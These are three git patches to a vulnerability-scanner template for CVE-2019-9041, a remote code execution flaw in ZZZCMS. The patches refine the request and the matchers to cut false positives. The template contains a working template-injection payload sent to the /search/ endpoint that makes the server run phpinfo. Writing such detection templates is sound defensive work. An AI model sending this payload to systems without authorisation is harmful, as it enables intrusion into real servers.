From 8e3d9c97ce604d0f2402c25ef4c4cdbfb73019d7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Mon, 25 Sep 2023 16:24:23 +0200 Subject: [PATCH 1/3] ZZZCMS RCE is a false positive if we see phpinfo() without posting any data --- http/cves/2019/CVE-2019-9041.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index cef42a950c6..9cfe4a4be42 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -23,6 +23,13 @@ info: tags: cve,cve2019,zzzcms,rce,edb http: + - method: POST + path: + - "{{BaseURL}}/search/" + + headers: + Content-Type: application/x-www-form-urlencoded + - method: POST path: - "{{BaseURL}}/search/" @@ -36,7 +43,13 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_1 + words: + - "phpinfo" + negative: true + + - type: word + part: body_2 words: - "phpinfo" - "PHP Version" From f188fcbe2f804f8e01b6657667517bc307d0bdb6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Mon, 25 Sep 2023 16:28:43 +0200 Subject: [PATCH 2/3] more precise status code match --- http/cves/2019/CVE-2019-9041.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 9cfe4a4be42..5e689dd94a7 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -54,6 +54,6 @@ http: - "phpinfo" - "PHP Version" - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' From 59151619bc4440583ed658fc41d0364b58e9e405 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 26 Sep 2023 10:19:09 +0530 Subject: [PATCH 3/3] req and matcher update --- http/cves/2019/CVE-2019-9041.yaml | 40 ++++++++++--------------------- 1 file changed, 13 insertions(+), 27 deletions(-) diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 5e689dd94a7..679baf3389d 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -23,37 +23,23 @@ info: tags: cve,cve2019,zzzcms,rce,edb http: - - method: POST - path: - - "{{BaseURL}}/search/" + - raw: + - | + POST /search/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - headers: - Content-Type: application/x-www-form-urlencoded + - | + POST /search/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - - method: POST - path: - - "{{BaseURL}}/search/" + keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if} - body: | - keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if} - - headers: - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and matchers: - - type: word - part: body_1 - words: - - "phpinfo" - negative: true - - - type: word - part: body_2 - words: - - "phpinfo" - - "PHP Version" - - type: dsl dsl: - 'status_code_2 == 200' + - '!contains(body_1, "phpinfo")' + - 'contains_all(body_2, "phpinfo","PHP Version")' + condition: and